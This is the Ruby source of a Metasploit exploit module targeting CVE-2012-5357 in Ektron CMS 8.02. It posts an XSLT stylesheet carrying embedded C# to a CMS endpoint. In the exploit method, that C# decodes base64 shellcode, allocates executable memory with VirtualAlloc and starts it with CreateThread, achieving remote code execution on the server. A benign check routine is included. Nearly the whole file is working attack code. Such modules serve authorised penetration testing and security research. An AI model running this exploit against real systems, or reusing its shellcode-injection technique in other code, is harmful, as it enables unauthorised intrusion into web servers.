Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
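##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Path of the AJAX transform endpoint, relative to the TARGETURI base path.
  TRANSFORM_PATH = 'WorkArea/ContentDesigner/ekajaxtransform.aspx'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
          vulnerability exists due to the insecure usage of XslCompiledTransform, using a
          XSLT controlled by the user. The module has been tested successfully on Ektron CMS
          8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
          SERVICE privileges.
        },
        'Author' => [
          'Rich Lundeen', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-5357' ],
          [ 'OSVDB', '88107' ],
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' => [
          ['Windows 2003 SP2 / Ektron CMS400 8.02', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # NOTE(review): HTTP_DELAY is not read anywhere in this module (it issues a
    # single POST and never serves a payload over HTTP); it is kept so the
    # option set exposed to existing resource scripts stays unchanged.
    register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
      ]
    )
  end

  # Probes the transform endpoint with a benign stylesheet whose C# extension
  # function only returns a random marker, and looks for that marker in the
  # response.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the marker is echoed
  #   back in a clean HTTP 200 response, Unknown when no response was received
  #   at all, Safe otherwise.
  def check
    fingerprint = rand_text_alpha(5 + rand(5))
    script = <<~CSHARP
      public string xml()
      {
      return "#{fingerprint}";
      }
    CSHARP

    res = send_xslt(build_xslt(script))
    # No response at all says nothing about the target; do not report Safe.
    return Exploit::CheckCode::Unknown if res.nil?
    return Exploit::CheckCode::Vulnerable if marker_echoed?(res, fingerprint)

    Exploit::CheckCode::Safe
  end

  # Base path from TARGETURI, guaranteed to end with a single trailing slash.
  # Works on a copy so the string returned by target_uri.path is never
  # mutated in place.
  #
  # @return [String]
  def uri_path
    path = target_uri.path.to_s.dup
    path << '/' unless path.end_with?('/')
    path
  end

  # Referer header sent with the transform request: scheme chosen from the SSL
  # option, then the configured host, port and base path.
  #
  # @return [String]
  def build_referer
    scheme = datastore['SSL'] ? 'https://' : 'http://'
    "#{scheme}#{rhost}:#{rport}#{uri_path}"
  end

  # Wraps a C# extension-function body in the XSLT stylesheet the endpoint
  # accepts. The msxsl:script block is compiled server-side and the template
  # calls user:xml() so its return value appears in the transform output.
  #
  # @param script [String] C# source placed inside the CDATA section
  # @return [String] complete XSLT 1.0 document
  def build_xslt(script)
    <<~XSLT
      <?xml version='1.0'?>
      <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:msxsl="urn:schemas-microsoft-com:xslt"
        xmlns:user="http://mycompany.com/mynamespace">
      <msxsl:script language="C#" implements-prefix="user">
      <![CDATA[
      #{script}
      ]]>
      </msxsl:script>
      <xsl:template match="/">
        <xsl:value-of select="user:xml()"/>
      </xsl:template>
      </xsl:stylesheet>
    XSLT
  end

  # POSTs a stylesheet to the transform endpoint as the 'xslt' form field; the
  # 'xml' field carries a random document since only the stylesheet matters.
  #
  # @param xslt_data [String] stylesheet produced by build_xslt
  # @return [Rex::Proto::Http::Response, nil] nil when no response arrived
  def send_xslt(xslt_data)
    send_request_cgi(
      {
        'uri' => "#{uri_path}#{TRANSFORM_PATH}",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
        'headers' => {
          'Referer' => build_referer
        },
        'vars_post' => {
          'xml' => rand_text_alpha(5 + rand(5)),
          'xslt' => xslt_data
        }
      }
    )
  end

  # True when the response is an HTTP 200 whose body contains the marker and
  # no "Error" text; shared by check and exploit so both judge success alike.
  #
  # @param res [Rex::Proto::Http::Response, nil]
  # @param fingerprint [String] marker returned by the C# xml() function
  # @return [Boolean]
  def marker_echoed?(res, fingerprint)
    return false unless res && res.code == 200

    body = res.body.to_s
    body.include?(fingerprint) && !body.match?(/Error/)
  end

  # Submits the stylesheet carrying the C# extension function (compiled and
  # run server-side by XslCompiledTransform) and reports on the marker echo.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when no response arrives or the
  #   response does not carry the marker
  def exploit
    print_status('Generating the EXE Payload and the XSLT...')
    fingerprint = rand_text_alpha(5 + rand(5))

    # payload.encoded is embedded base64-encoded into the C# source.
    script = <<~CSHARP
      private static UInt32 MEM_COMMIT = 0x1000;
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

      public string xml()
      {
      string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
      byte[] shellcode = System.Convert.FromBase64String(shellcode64);
      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
      IntPtr hThread = IntPtr.Zero;
      IntPtr pinfo = IntPtr.Zero;
      UInt32 threadId = 0;
      hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
      return "#{fingerprint}";
      }
    CSHARP

    print_status('Trying to run the xslt transformation...')
    res = send_xslt(build_xslt(script))
    # Separate "no answer" from "unexpected answer" so the operator sees which.
    fail_with(Failure::Unreachable, 'No response to the xslt transformation request') if res.nil?
    unless marker_echoed?(res, fingerprint)
      fail_with(Failure::Unknown, 'There was an unexpected response to the xslt transformation request')
    end

    print_good('Exploitation was successful')
  end
end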